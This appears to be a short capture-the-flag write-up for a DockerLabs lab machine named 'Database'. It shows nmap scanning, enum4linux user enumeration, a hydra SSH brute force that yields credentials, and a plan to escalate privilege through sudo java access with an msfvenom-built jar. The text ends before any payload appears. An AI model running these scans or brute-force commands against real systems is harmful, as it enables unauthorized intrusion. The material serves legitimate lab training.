Writeup Database DockerLabs
Let's start our reconnaissance with a quick nmap scan.
nmap -p- --open -sV -sC -sS --min-rate=5000 -n -Pn 172.17.0.2 -oN Nmap1
-p- - Search for open ports
--open - List open ports
-sS - A quick scan mode
-sC - Use a set of reconnaissance scripts
-sV - Find the version of the open service
--min-rate=5000 - Makes the reconnaissance even faster by sending no fewer than 5000 packets
-n - No DNS resolution
-Pn - No ping
We see that port 22 SSH, port 80 HTTP, port 445, and port 139 Samba are open.
Web Enumeration
If we access the website, we see the following
We can use Gobuster to perform web reconnaissance and see which directories we can find on that site, but first I want to see if we can find some users with Enum4Linux and then just make a brute force on SSH Port 22
We start Enum4Linux:
enum4linux -a 172.17.0.2
As we can see, we have 3 users, and now we can start brute-forcing on SSH.
hydra -L users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://172.17.0.2 -t 64
User: augustus
password: lovely
Let's validate these credentials via SSH.
We are now inside the machine. Let's look for a way to escalate privileges.
Privilege Escalation
If we run sudo -l, we see that we can execute the java binary as dylan.
Open the Browser and search on Google: Escalate privilege java
As we can see, we need to create a jar file with msfvenom.
